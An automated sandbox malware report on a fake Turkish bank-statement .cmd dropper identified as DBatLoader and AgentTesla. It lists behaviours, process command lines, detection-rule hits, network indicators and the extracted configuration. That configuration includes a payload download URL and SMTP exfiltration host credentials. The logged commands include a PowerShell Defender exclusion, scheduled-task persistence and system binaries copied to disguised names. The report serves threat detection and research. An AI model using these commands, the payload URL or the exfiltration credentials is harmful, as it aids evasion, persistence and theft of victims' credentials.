Edit tour

Windows Analysis Report
TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd

Overview

General Information

Sample name:	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd
Analysis ID:	1554476
MD5:	c3fd77ee6020a412a9ce44fe17c703dd
SHA1:	9ce6674753ea01856b334a26068cb6df9cb07d0f
SHA256:	19b0d0d3e3946758994d9260a1e11b794ab964ef0c8b5aa9c43a3dae7c2be495
Tags:	cmduser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected AgentTesla

Yara detected DBatLoader

.NET source code contains very large strings

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops executable to a common third party application directory

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Infects executable files (exe, dll, sys, html)

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 6052 cmdline: extrac32 /y "C:\Users\user\Desktop\TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)

x.exe (PID: 4308 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)

cmd.exe (PID: 3228 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

esentutl.exe (PID: 2676 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 6128 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)

esentutl.exe (PID: 3364 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)

conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

lxsyrsiW.pif (PID: 2924 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 6488 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

powershell.exe (PID: 5148 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7248 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5988 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TrojanAIbot.exe (PID: 1088 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cmd.exe (PID: 1272 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD0BF.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6052 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

TrojanAIbot.exe (PID: 7184 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)

Wisrysxl.PIF (PID: 7428 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)

lxsyrsiW.pif (PID: 7528 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 7592 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 7612 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

Wisrysxl.PIF (PID: 7804 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 31BC6907D6097A76BB1DD891CFC09B7A)

lxsyrsiW.pif (PID: 7868 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)

neworigin.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)

server_BTC.exe (PID: 7948 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

TrojanAIbot.exe (PID: 8088 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\neworigin.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

Memory Dumps

Source	Rule	Description	Author
0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: neworigin.exe PID: 6488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 6488	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: neworigin.exe PID: 7592	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: neworigin.exe PID: 7592	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.0.neworigin.exe.6d0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.0.neworigin.exe.6d0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.0.neworigin.exe.6d0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.x.exe.2d90000.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4308, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4308, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 2924, ProcessName: lxsyrsiW.pif

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6788, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5148, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4308, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 2924, ProcessName: lxsyrsiW.pif

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 6788, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6788, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5988, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 6488, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 6788, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5148, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T15:28:27.297167+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	49708	TCP
2024-11-12T15:28:58.958739+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	50629	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-12T15:28:10.530955+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	198.252.105.91	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Avira: detection malicious, Label: HEUR/AGEN.1311721

Found malware configuration

Source: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
Source: 12.0.neworigin.exe.6d0000.0.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49755 version: TLS 1.2

Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054000196.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A75000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000007.00000003.2106786237.0000000005180000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2111119072.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054794048.0000000002B5F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2111066376.0000000021E9F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2136598756.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2111066376.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054000196.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A75000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000007.00000003.2106786237.0000000005180000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2111119072.0000000000B90000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02D95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02D95908

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
